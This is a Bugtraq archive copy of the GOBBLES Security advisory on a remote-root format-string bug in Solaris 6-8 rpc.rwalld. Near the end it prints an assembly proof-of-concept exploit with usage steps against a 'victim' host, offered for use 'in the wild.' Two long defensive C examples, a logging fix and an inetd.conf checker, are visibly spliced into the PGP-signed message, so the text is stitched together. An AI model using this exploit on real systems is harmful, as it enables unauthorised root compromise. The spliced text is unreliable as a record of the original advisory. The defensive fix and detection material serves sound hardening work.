Bugtraq mailing list archives

Advisory + Exploit for Remote Root Hole in Default Installation of Popular Commercial Operating System


From: gobbles () hushmail com
Date: Tue, 30 Apr 2002 06:34:29 -0700


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

GOBBLES SECURITY ADVISORY #32

ALERT! REMOTE ROOT HOLE IN DEFAULT INSTALL OF POPULAR OPERATING SYSTEM! ALERT!

Forward:
<@route> so was fydor trying to make his code unreadable when he write nmap?
<@route> or was that just the fallout of poor planning?
<@route> this is awful
<@route> if ( !victim || !sport || !dport || sd < 0) {
<@route>   fprintf(stderr, "send_udp_raw: One or more of your parameters
         suck!\n");
<@route>   free(packet);
<@route>   return -1;
<@route> }
<@route> This is the program that is used everywhere and written up in
         countless books?
<@route> it's pretty much obscene that this program doesnt use libnet

Systems Affected:
Sun Solaris 6, Sun Solaris 7, Sun Solaris 8
(sparc and x86 versions)


Threat Level:
Super duper high.


Vendor Notification Status:
Initial advisory sent to Sun Microsystems on Friday, April 5th.

After long series of email exchange, Sun.com engineers finally begin working
on developing patch for bug.

Days later, CERT contact GOBBLES about bug.  Dialogue happen then too with
CERT.  Both Sun Microsystems and CERT have promised to make sure that
GOBBLES name is in both official advisories released.  Hey, we do this for
fame and attention, now that we are no longer weaned we must do something!

Some time, full disclosure is real pain in ass.  Everyone want more and more
time to get things fixed before advisory is released.  Time to grace lists
with more GOBBLES Advisory.


Exploit:
A proof-of-concept exploit for this vulnerability has been attached to the
bottom of this email.  GOBBLES wrote it in way to keep unskilled from using
it, like security assessment team from Vigilante who not able to tell if
vulnerability is real or not in opensourced product after reading advisory.
At the same time, skilled penetrators should not have any trouble using the
code provided to exploit systems in the wild.

Don't send GOBBLES email asking for other versions of exploit.  Some things
better left private and given to close friends for their own motivations.
If you can't figure out how to work with this exploit and get remote root
from what is provided in the advisory, really there is no reason for you to
be using an exploit.


A Few Words:
There are some thing that GOBBLES have to say, some thing very heartfelt
that he need to communicate to the world, some thing that best said in song,
please take time to read lyric and understand what GOBBLES trying to say. . .

"the sun has blessed
 the rays are gone
 and all the kids have left their tears and gone home,

 sweet 17, sour 29
 and i can't explain myself
 what i'd hoped to find
 you were all so kind
 when i was near,

 and if you're still feeling down
 then maybe you need me around
 to love and hold you
 don't say i hadn't told you so
 maybe you need me around,

 i had no luck
 i had no shame
 i had no cause
 just seventeen days of rain
 and you in my eyes,

 just one more song to slay this earth
 and i can't explain myself just what it's worth
 what was all i had
 but not all i'd need
 and i can't escape the fact that i still bleed,

 and if you're still feeling down
 and if this seems way too loud
 then maybe you need me around,

 i had no voice
 i had no drive
 i had no choice
 i've done my time
 had myself
 had my band
 i had my love
 had no hand in watching it all fall apart

 and if you're still feeling down
 then maybe you need me around
 to lift and scold you
 to send you crashing all right now
 maybe you need me around."

-Blissed and Gone, the Smashing Pumpkins


Description of Problem (Part One):
One of the default RPC services in Sun Solaris versions 6-8 has an
insecure syslog() statement, which allow remote attacker to execute custom
code as root.

Hehe, GOBBLES bet you getting pissed because in all this length of advisory,
still no mention of what is vulnerable, hehehe, ;PPPPpppppppppppppppp.  Keep
control of temper, and keep reading, because you about to find out, hehehe
GOBBLES is silly today.


Remotely Exploitable:
Yes.

Locally Exploitable:
Yes.

Privilege Attained After Exploitation:
Root.

Exploit Included:
As GOBBLES did mention previously, yes.  It get you root.  Girls will be
impressed with mailing list reading skills and source code leeching
technique utilized to gain remote root to Solaris machines.  Included
exploit for Sparc.


Name of Vulnerable Service:
$ grep rwall /etc/inetd.conf
# The rwall server allows others to post messages to users on this machine.
walld/1         tli     rpc/datagram_v  wait root /usr/lib/netsvc/rwall/rpc.rwalld      rpc.rwalld

It rwalld that vulnerable.  It run as root.  Attacker get root from
exploiting it.


Description of Problem (Part Two):
Inside rwall_subr.c we see:

   /*
    * Make sure the wall programs exists, is executeable, and runs
    */
   if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 ||
      (fp = popen(WALL_PROG, "w")) == NULL) {
          syslog(LOG_NOTICE,
                   "rwall message received but could not execute %s",
                   WALL_PROG);
          syslog(LOG_NOTICE, msg);

Bug easy enough to spot, but now question is, "GOBBLES, friend, how is
this to be exploited?  Faulty syslog() only called if rpc.rwalld can not
execute /usr/sbin/wall on local system, which mean it only exploitable if
admin have chmod -x or rm /usr/sbin/wall or something like this, right, so
why this so such a big deal?"

To this GOBBLES say, "Friend IDIOT, faulty syslog() is called if anything is
to make popen() fail, there one other way to exploit bug, which make it
dangerous and affect all installation of Solaris running rpc.rwalld, is that
popen() to fail if there no available file descriptors on system."

This easier to exploit locally on system.  For remote exploitation, timing
is important and thus is race condition.  Each new tcp session to running
service on target host will consume filedescriptor.  Then run attached
exploit to have root handed over, like operator status given to route in
#phrack with no question ask.
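The defect above is the classic format-string pattern: the rwall body is handed to syslog() as the format argument instead of as data. The following is an added example written for this archive page, not Sun's rwall_subr.c and not part of the GOBBLES exploit. It places the vulnerable call beside the one-line fix (a literal format with the message as a %s argument) and adds two defensive helpers a daemon or log pipeline can use: a counter for %-directives in an untrusted message (an rwall body has no benign reason to contain any) and a percent-escaper for a downstream consumer that cannot be changed. The sample message body and the "rwall message received:" prefix are constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Added example, not Sun's rwall_subr.c. The line the advisory points at,
 * syslog(LOG_NOTICE, msg), hands the untrusted rwall body to syslog as the
 * FORMAT argument, so any %-directive inside it is interpreted. The fix is a
 * fixed format literal with the message passed as a %s argument. */

/* Mirrors the vulnerable pattern for side-by-side reading only. Never called
 * with untrusted data anywhere in this file. */
void log_notice_vulnerable(const char *msg)
{
    syslog(LOG_NOTICE, msg);                        /* msg IS the format: bug */
}

/* Hardened form: the format string is a literal, the message is data. */
void log_notice_hardened(const char *msg)
{
    syslog(LOG_NOTICE, "rwall message received: %s", msg);
}

/* Count conversion directives in an untrusted string; "%%" is a literal
 * percent sign and does not count. A non-zero result on an rwall body is
 * worth an alert even after the fix, since it has no benign reason to occur. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {          /* escaped percent: skip both characters */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

/* Neutralise a message for a downstream consumer that cannot be changed and
 * still treats its input as a format: double every '%'. Returns bytes written
 * (excluding the NUL), or -1 if out is too small. */
int escape_percent(const char *in, char *out, size_t outlen)
{
    size_t j = 0;
    for (; *in; in++) {
        size_t need = (*in == '%') ? 2 : 1;
        if (j + need >= outlen)
            return -1;
        out[j++] = *in;
        if (*in == '%')
            out[j++] = '%';
    }
    out[j] = '\0';
    return (int)j;
}

/* Escape `in` into a local buffer and report whether it equals `expected`. */
int escape_percent_matches(const char *in, const char *expected)
{
    char buf[256];
    if (escape_percent(in, buf, sizeof buf) < 0)
        return 0;
    return strcmp(buf, expected) == 0;
}

/* Build the line the hardened path would log, into a caller buffer, so the
 * behaviour can be checked without touching the system log. */
int format_log_line(char *out, size_t outlen, const char *msg)
{
    return snprintf(out, outlen, "rwall message received: %s", msg);
}

/* Format `msg` the hardened way and report whether the line equals `expected`. */
int log_line_matches(const char *msg, const char *expected)
{
    char buf[256];
    if (format_log_line(buf, sizeof buf, msg) < 0)
        return 0;
    return strcmp(buf, expected) == 0;
}

int main(void)
{
    /* Constructed sample body carrying the directives a format-string attack
     * relies on; with the hardened call they are plain text. */
    const char *body = "hello %x%x%n%s and 100%%";
    char line[256], esc[256];

    printf("directives in body: %d\n", count_format_directives(body));
    if (escape_percent(body, esc, sizeof esc) >= 0)
        printf("escaped body:       %s\n", esc);
    format_log_line(line, sizeof line, body);
    printf("hardened log line:  %s\n", line);

    openlog("rwalld-example", LOG_PID, LOG_DAEMON);
    log_notice_hardened(body);   /* safe: body is an argument, not the format */
    closelog();
    return 0;
}
```

The fix is the whole story for the code: once the format is a literal, the popen() failure path the advisory describes (file descriptors exhausted by a flood of connections) still logs the message, but only as text. The directive counter is the detection side: a message containing %n or %hn arriving at a service that never expects them is a signal worth logging separately, whether or not the host is patched.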


Patch Available:
Fucked if GOBBLES knows.


Suggested Workaround:
GOBBLES suggest that admin disable rwalld from /etc/inetd.conf until patch
made available, then restart it, if you wait until patch available until
upgrade you probably have to do upgrade by reinstalling operating system,
because now exploit out and probably in hands of less than ethical
penetrator looking to abuse you in one way or another.
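The workaround is a one-line change to /etc/inetd.conf, and the thing an administrator most wants afterwards is a way to confirm it is really applied on every host. The following is an added example for this archive page, not code from the advisory or from Sun: it checks an inetd.conf text for an uncommented walld entry and produces a copy with that entry commented out. It assumes the file layout shown in the advisory's grep output (first whitespace-delimited field is the service name such as walld/1, lines beginning with # are comments); the SAMPLE_CONF contents are constructed to resemble that excerpt.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Constructed sample resembling the Solaris inetd.conf excerpt in the advisory
 * (not a real file); the telnet line is filler to show untouched entries. */
static const char SAMPLE_CONF[] =
    "# The rwall server allows others to post messages to users on this machine.\n"
    "walld/1         tli     rpc/datagram_v  wait root /usr/lib/netsvc/rwall/rpc.rwalld      rpc.rwalld\n"
    "telnet  stream  tcp     nowait  root    /usr/sbin/in.telnetd    in.telnetd\n";

/* Return 1 if `conf` (the contents of an inetd.conf) still has an
 * uncommented walld entry, 0 otherwise. Assumes the first field of each
 * line is the service name and '#' starts a comment. */
int walld_enabled(const char *conf)
{
    const char *line = conf;
    while (*line) {
        const char *end = strchr(line, '\n');
        size_t len = end ? (size_t)(end - line) : strlen(line);
        const char *p = line;
        while (p < line + len && isspace((unsigned char)*p))
            p++;
        if (p < line + len && *p != '#' && strncmp(p, "walld/", 6) == 0)
            return 1;
        if (!end)
            break;
        line = end + 1;
    }
    return 0;
}

/* Write a copy of `conf` into `out` with every active walld line commented
 * out. Returns the number of lines disabled, or -1 if `out` is too small. */
int disable_walld(const char *conf, char *out, size_t outlen)
{
    size_t j = 0;
    int disabled = 0;
    const char *line = conf;
    while (*line) {
        const char *end = strchr(line, '\n');
        size_t len = end ? (size_t)(end - line) + 1 : strlen(line);
        const char *p = line;
        while (p < line + len && (*p == ' ' || *p == '\t'))
            p++;
        int active = (*p != '#' && strncmp(p, "walld/", 6) == 0);
        size_t need = len + (active ? 1 : 0);
        if (j + need >= outlen)
            return -1;
        if (active) {
            out[j++] = '#';
            disabled++;
        }
        memcpy(out + j, line, len);
        j += len;
        if (!end)
            break;
        line = end + 1;
    }
    out[j] = '\0';
    return disabled;
}

/* Apply disable_walld to a local copy and re-verify: returns the number of
 * lines disabled when the result has no active walld entry, else -1. */
int disable_and_recheck(const char *conf)
{
    char buf[4096];
    int n = disable_walld(conf, buf, sizeof buf);
    if (n < 0 || walld_enabled(buf))
        return -1;
    return n;
}

int main(void)
{
    char fixed[4096];
    printf("walld active before: %d\n", walld_enabled(SAMPLE_CONF));
    int n = disable_walld(SAMPLE_CONF, fixed, sizeof fixed);
    printf("lines disabled: %d\n", n);
    printf("walld active after:  %d\n", walld_enabled(fixed));
    fputs(fixed, stdout);
    return 0;
}
```

Writing the result back over /etc/inetd.conf and signalling inetd to reread it is the part the advisory means by "then restart it"; the check function is what to run on each host afterwards, since an entry that was only commented out in one copy of the file is the usual way the workaround silently fails to stick.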


Security Candy:

-begin copy-

/*
   Remote Root Exploit for Solaris 6-8 rpc.walld

      Usage Instructions:
       1. Compile.
           gcc -o xwall xwall.s
       2. Run.
          (./xwall ; ./shellcode) | rwall victim
        3. Late Easter egg.
          strings xwall

      Note(s):
       Something else must be done to consume FD's on
       victim system.  Figure this one out for self.

       This exploit written to be run on Linux.  Supplied
       format string is for Sparc Solaris.  Provide own
       remote shellcode and use as above described.

   Love,
   GOBBLES Security
   http://www.bugtraq.org
   GOBBLES () hushmail com
*/


retloc:
.long 0x41424344
retaddr:
.long 0x60bb135
padding:
.long 4
walkcount:
.long 1
.globl main
.type main,@function
main:
pusha
movl (padding),%ecx
jusfhds7fg:
pushl %ecx
movl $4,%eax
movl $1,%ebx
pushl $0x00000041
movl %esp,%ecx
movl $1,%edx
int $0x80
popl %ecx
popl %ecx
loop jusfhds7fg
movl %esp,24(%esp)
pushl $0x42424242
movl $4,%edx
movl %esp,%ecx
movl $1,%ebx
movl $4,%eax
int $0x80
movl (retloc),%eax
bswapl %eax
pushl %eax
subl $4,%ecx
movl %edx,%eax
int $0x80
addl $4,%ecx
movl %edx,%eax
int $0x80
subl $4,%ecx
popl %eax
bswapl %eax
incl %eax
incl %eax
bswapl %eax
pushl %eax
movl %edx,%eax
int $0x80
popl %eax
movl %esp,%edx
incl %edx
xorl %esi,101(%ebp)
andb %al,111(%edx)
popa
pushl %edx
andb %al,97(%ebx)
decl %esi
aaa
andb %al,111(%ebx)
incl %esp
xorl (%ecx),%eax
movl (walkcount),%ecx
cmpl $0,%ecx
je nczxhczjcg89zg89
pushl %ecx
movl $4,%edx
movl $1,%ebx
pushl $0x78382e25
cmzxnczxcz8c:
pushl %ecx
movl %esp,%ecx
addl $4,%ecx
movl $4,%eax
int $0x80
popl %ecx
loop cmzxnczxcz8c
popl %ecx
popl %ecx
nczxhczjcg89zg89:
movl (retaddr),%edx
pushl %edx
shr $16,%edx
subl %edx,(%esp)
movw $0,2(%esp)
pushl %edx
shll $3,%ecx
subl %ecx,(%esp)
movl (padding),%edx
subl %edx,(%esp)
subl $16,(%esp)
movw $0,2(%esp)
pushl $cznxczxczxh8
call printf
movl $1,%eax
int $0x80
cznxczxczxh8:
.string "%%%uc%%hn%%%uc%%hn\n"

-begin paste-


Greets:
route, because route deserves attention, use libnet it rulez.  route, why
you refuse GOBBLES interview on supposed intrusion on @stake subnet that was
allowed when some malicious local user ran trojaned blackhat warez?  GOBBLES
need to confirm with you if this really did happen, please respond soon...

Tracy () mp3 com, the Official Sysadmin Mascot of GOBBLES Security.  Thanks for
letting GOBBLES know to cut out the "leet gr33tz" from advisory, now people
hold lots of respect for GOBBLES.  Thanks Tracy, you're a peach.  Next
advisory will be disclosure of 0day CSS holes in mp3.com's website...

w00w00 Security Development, publishing advisories at the blinding speed of
1 per 3 years, and still being the largest active nonprofit security group in
the world, to the eyes of the public.  Disclosure is good when it serve a
political agenda, hehehehe...

The Securityfocus Staff, who often reject the legitimate research materials
of GOBBLES from their lists, but make sure they archive it on their website
anyways.  Thanks for at least giving us some of the credit that we deserve.
In the future, though, if our submissions don't meet your requirements for
publication on the lists, don't put them on your website.  Enough of this
double standards bullshit.

zen-parse, for defining what a whitehat is -- no skill, no ethic, no respect.

and finally, the beautiful Jennifer Garner, who play Sydney Bristow in tv
show Alias, who many member of GOBBLES Security is in love with.  You win free
GOBBLES Security tshirt, come to defcon in August to get it, hehehehehehe!





-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlwEARECABwFAjzOnwwVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPt4sA
n0+78j2dzLIufxrdL5A8GcqG/ZPnAKCAnpQVJKw3PYNFN9fFjEfBcGCruQ==
=jCTV
-----END PGP SIGNATURE-----
